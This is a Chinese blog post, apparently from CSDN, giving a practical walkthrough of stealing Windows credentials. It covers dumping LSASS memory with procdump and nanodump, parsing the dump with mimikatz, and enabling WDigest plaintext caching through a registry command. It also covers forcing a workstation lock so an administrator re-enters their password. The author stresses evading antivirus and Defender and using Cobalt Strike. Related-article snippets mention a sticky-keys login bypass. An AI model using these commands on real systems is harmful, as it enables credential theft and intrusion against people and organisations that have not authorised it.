Windows密码破解常见手段

最新推荐文章于 2024-05-31 16:35:55 发布
最新推荐文章于 2024-05-31 16:35:55 发布
阅读量1.1k 收藏 26
点赞数 15
文章标签: windows 网络 安全 密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/138705303
版权

mimikatz导出lsass破解

如果域管在成员机器上登录过,那么密码机会保存到lsass.exe进程当中,可以通过mimikatz读取密码

用本地管理员登录本地机器 导出hash

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

图片

这个工具可以直接导出lsass进程中的密码,可以利用这点导出密码,拿hash到本地mimikatz解
这种方式可以规避杀软

procdump64.exe -accepteula -ma lsass.exe lsass.dump

图片

如果是实战环境可以直接拿出本地解开

Mimikatz.exe “sekurlsa::minidump w:/lsass.dump” “sekurlsa::logonPasswords full” > w:/1.txt

注意,如果运行着一条代码有问题的话

报错如下:ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory

可以尝试把lsass.dump文件换到根盘符下,手动打开mimikatz敲命令

例如:w:/lsass.dump

图片

图片

图片

2012无法获取明文密码?

可以这样操作

wdigest
WDigest协议是在WindowsXP中被引入的,旨在与HTTP协议一起用于身份认证。默认情况下,Microsoft在多个版本的Windows(Windows XP-Windows 8.0和Windows Server 2003-Windows Server 2012)中启用了此协议,这意味着纯文本密码存储在LSASS(本地安全授权子系统服务)进程中。
UseLogonCredential 值设置为 0, WDigest 不把凭证缓存在内存;UseLogonCredential 值设置为 1, WDigest 就把凭证缓存在内存。
1 开启WDigest

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

2、开启WDigest把凭证缓存在内存
强制锁屏等待目标系统管理员重新登录

rundll32.exe user32.dll,LockWorkStation

3 截取明文密码
4关闭WDigest

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
#关闭Wdigest Auth服务

nanodump获取lsass文件

这也是github上面的项目,很热乎,刚提交不交,被我无意间发现了,这就是个宝藏。
github 项目https://github.com/helpsystems/nanodump
这个项目的特点:

  • 使用系统调用(使用SysWhispers2)进行大多数操作

  • 可以选择在不接触磁盘的情况下下载转储或将其写入文件

  • 默认情况下,小型转储具有无效签名以避免检测

  • 通过忽略不相关的 DLL 来减小转储的大小,转储的大小往往在 10 MB 左右

  • 不需要提供 LSASS 的 PID(默认是不提供的)

  • 不调用dbghelp或任何其他库,所有转储逻辑都在 nanodump 中实现

  • 可以使用 .exe 版本在 Cobalt Strike 之外运行_nanodump_z

值得一提的是,这个项目能过windows defender 进行dump lsass内存,且只把相关的内容给dump下来,非常的香!!!支持cs脚本使用,且是通过命名管道传输,不接触磁盘。
值得注意的是:
文件小是因为忽略lsass中的大部分内容并仅保留与 mimikatz 相关的那些,例如 kerberos.dll 和 wdigest.dll
编译就不说了,一个命令搞定,不能就两个。
本地测试:

图片

虽然文章是这样说,我已经把df关了,如果你执行nanodump的话 Beacon会暂停使用,优先下载lsass文件
也就是说 如果你要dump lsass文件,那么可能会暂时性的无法执行命令,建议在dump之前先再新建一个会话

图片

图片

procdump获取Lsass文件

这个工具可以直接导出lsass进程中的密码,可以利用这点导出密码,拿hash到本地mimikatz解
这种方式可以规避杀软

procdump64.exe -accepteula -ma lsass.exe lsass.dump

图片

破解lsass文件

Mimikatz.exe “sekurlsa::minidump WS2019SRV01_1677239595_lsass.dmp.dump” “sekurlsa::logonPasswords full” > 1.txt

图片


然后就是打开1.txt看结果就好了

  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

运维Z叔
关注
  • 15
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
window密码破解
03-17
密码破解累工具。
word密码破解方法
04-15
此外,这种方法本质上是一种破解手段,虽然在个人忘记密码时可以暂时解决问题,但在处理涉及他人隐私或敏感信息的文档时应谨慎使用,以免触犯法律。 总之,防止忘记Word密码的最佳策略是定期更改密码并妥善记录,...
口令破解——常见密码破解
sunxingstar的博客
08-24 5528
Windows口令破解-mimikatz 提升权限 一:privilege::debug 抓取密码 二:sekurlsa::logonpasswords Linux口令破解-mimipenguin 添加执行权限 一:chmod +x mimipenguin.sh 抓取密码 二:./mimipenguin.sh Hashcat 破解Linux密码文件shadow ./hashcat-cli32.bi...
mimkatz获取windows10明文密码
最新发布
banliyaoguai的博客
05-31 990
Windows 10或更高版本的系统中,默认情况下,操作系统会在内存缓存中禁止保存明文密码。然后,再次使用mimikatz等工具读取lsass.exe进程的内存,即可获取到明文密码mimikatz通过注入代码到操作系统的内存中,能够读取和解密这些由lsass.exe进程保存的加密凭证。具体的操作是,mimikatz先利用管理员权限执行一些操作,如使用procdump等工具lsass.exe进程转储成一个dmp文件。当用户登录时,lsass.exe会使用一个可逆的算法加密明文密码,并将密文保存在内存中。
利用5次shift漏洞破解win7密码
coderge's CSDN Blog.
08-02 1882
1 漏洞 1、在未登录系统时,连续按5次shift键,弹出程序c:\windows\system32\sethc.exe 2、部分win7及win10系统在未进入系统时,可以通过系统修复漏洞篡改系统文件名! 注:如win7或win10系统已修补漏洞2,则无法利用 2 破解过程相关知识 1、cmd工具路径 c:\windows\system32\cmd 2、用户/账户密码存储位置 c:\windows\system32\config\SAM # 非逆转型加密、使用hash值类似的方法、MD
Windows密码破解
weixin_51846555的博客
07-03 3786
这里主要介绍两种方法来破解Windows的开机密码
windows系统的密码破解
h1825819493的博客
04-04 1639
⑤ 最后一步就很简单,进入登陆界面之后,连续按五次shift键就可以跳出cmd命令提示符了(此时是具备管理员权限可以进行密码修改的)同样的方式找到cmd,把他进行复制,粘贴出一个副本,把副本改名为setch ,然后关掉所有,重启就可以了。再记事本中点击文件,选择打开,会进入我们的资源管理器。①我们先要将电脑进行开机,再开机启动界面出现的时候直接进行断电,让系统出现错误,出现启动修复。我们可能再登陆电脑的时候,会遇到忘记账号密码的情况,可以运用下面方法破解修改密码。知道这个以后,我们就可以进行运用。
破解windows密码
小卜的博客
10-23 1848
简单的破解密码,更正确的说是捕获修改密码
如何破解域控服务器管理员密码
02-23
### 如何破解域控服务器管理员密码 #### 背景介绍 在企业级网络环境中,域控制器(Domain Controller,简称DC)是管理用户、计算机和其他资源的...此外,建立良好的密码管理和备份机制也是预防此类问题的有效手段
利用Ghost光盘清除windows用户密码
03-12
在这种情况下,"利用Ghost光盘清除windows用户密码"是一种常见的解决方法。Ghost是一款由Symantec公司开发的数据备份与恢复工具,它能够创建系统镜像并进行快速恢复。在这里,我们将深入探讨如何使用Ghost光盘来解决...
Win10开机密码破解软件 windows密码修改工具
04-28
一款电脑开机密码破解软件,但它不能看到之前的密码是多少,但可以在不知道以前密码的情况下修改为新的密码,从而可以进系统。 它可以禁用开机密码,从而使之前的密码无效,也可以从新启用密码。 一般我们要在winpe下使用本软件,不然无法破解密码,所以一般把它拷贝到启动U盘里启动winpe下去使用它。 注意:如果你的电脑是UEFI的且你要直接dos启动本工具,你需要在bios里把启动模式改成Legacy / BIOS兼容模式,但winpe下不需要修改。 支持winxp,win7和win8与win10系统,内含32位和64位两个版,要按你的系统版本使用。 技术细节 : 该脚本尝试查找所有现有的Windows安装和相应的Windows版本。 此后,更改权限后,将以“良性”字节序列替换负责密码验证的CMP指令。 为了恢复更改,过程恰恰相反。 整个想法源于WindowsGate和Astr0baby的教程 用法: 打开软件后选择操作系统驱动器并使用按钮,备份,恢复,修补或取消打包。
Windows系统管理员账号密码Hash哈希解密工具[CSDN版]
03-02
该工具为本人原创,CSDN论坛首发, 功能为在线解密Windows系统管理员账号密码Hash哈希值。 至于获取Hash百度有方法,本工具可以解密你得到的Hash值, 成功率90%以上! 有些大长度结构复杂的密码会失败!
dos命令及破解windows密码
01-06
dos命令及破解windows密码。 常用的命令,他人整理的文档上传共享
Windows系统管理员账号密码Hash哈希解密工具
11-06
在线解密Windows系统管理员账号密码Hash哈希值。 至于获取Hash百度有方法,本工具可以解密你得到的Hash值
域管理员密码解除方法二则
12-07
DC管理员密码丢失的情况很少见,很多管理员根本就碰不到这种情况,出现这种情况下大多数处理方法是重做域控。这里提供的是不需重做域控的DC管理员密码恢复方法,但需针对实际情况修改脚本内容。 在此二种针对WINDOWS 2003域控密码丢失,提供的破解恢复的方法,经实际在DELL2950及HP服务器上测试均能够破解win2003域控的管理员密码,修改里面的批处理文件可破解指定的用户的密码(含修改过用户名的管理员帐户)!但需有权限进入机房并在有授权对域控进行操作的条件下进行域控密码恢复。 具体用法,请查看压缩包里的文档说明,所用的软件和方法是参考网络上资料,对于原资料出处没有记录,请谅解。如对此方法用到的批处理有疑问可发邮件给我。
Windows系列操作系统的安全配置策略
02-08
操作系统安全概述及常见网络入侵手段 操作系统是应用软件和服务运行的公共平台,操作系统安全漏洞是网络入侵的重要因素。操作系统的安全问题主要表现在:以操作系统为手段,获得授权以外的或未授权的信息;以操作...
windows 系统密码破解工具(适合各种版本windows
weixin_34018202的博客
03-21 4242
破解WINDOWS7系统登陆密码(含文字和图片教程) 一、用MAXDOS工具箱轻轻松松破解WINDOWS所有操作系统的用户登陆密码破解工具箱下载http://www.vdisk.cn/down/index/4870249A7158 然后将镜像刻成光盘,然后再需要破解的机器上用此光盘启动,弹出光盘界面选择运行MAXDOS工具箱,再继续选择A强化工具箱进入输入命令PWD,...
Windows全系列 本地密码暴力破解
章叁的博客
11-28 1496
Windows全系列 本地密码暴力破解
Windows 有哪些提权手段
07-12
Windows操作系统中,存在一些常见的提权手段,攻击者可以利用这些漏洞或技术来获取更高的权限。以下是一些常见Windows提权手段: 1. 弱口令攻击:通过猜测或暴力破解管理员或其他高权限用户的密码来获取权限。 2. 本地提权漏洞利用:利用操作系统或应用程序中存在的漏洞,以提升普通用户的权限。例如,利用未修补的操作系统组件或应用程序的漏洞来执行恶意代码并提升权限。 3. 提权工具利用:使用专门设计的提权工具,如Mimikatz、Metasploit等,利用操作系统或应用程序中的漏洞来获取更高的权限。 4. 垃圾数据的滥用:利用操作系统或应用程序中存在的缓冲区溢出或其他安全漏洞,将恶意数据输入到系统中,从而执行任意代码并提升权限。 5. 服务劫持:通过修改系统服务配置或替换系统服务文件,使其执行恶意代码并获取更高的权限。 6. 访问令牌滥用:利用Windows操作系统中的访问令牌机制,如利用访问令牌窃取、提权或滥用其他用户的令牌。 7. DLL劫持:通过操纵应用程序加载的动态链接库(DLL),将恶意DLL替换为合法DLL,从而在受影响的应用程序中执行恶意代码并提升权限。 请注意,这些提权手段都是非法的,仅供安全专业人员和研究人员在合法和授权的测试环境中使用。在实际应用中,确保系统安全的最佳做法是定期更新和修补操作系统和应用程序,以及强化用户帐户和访问控制策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值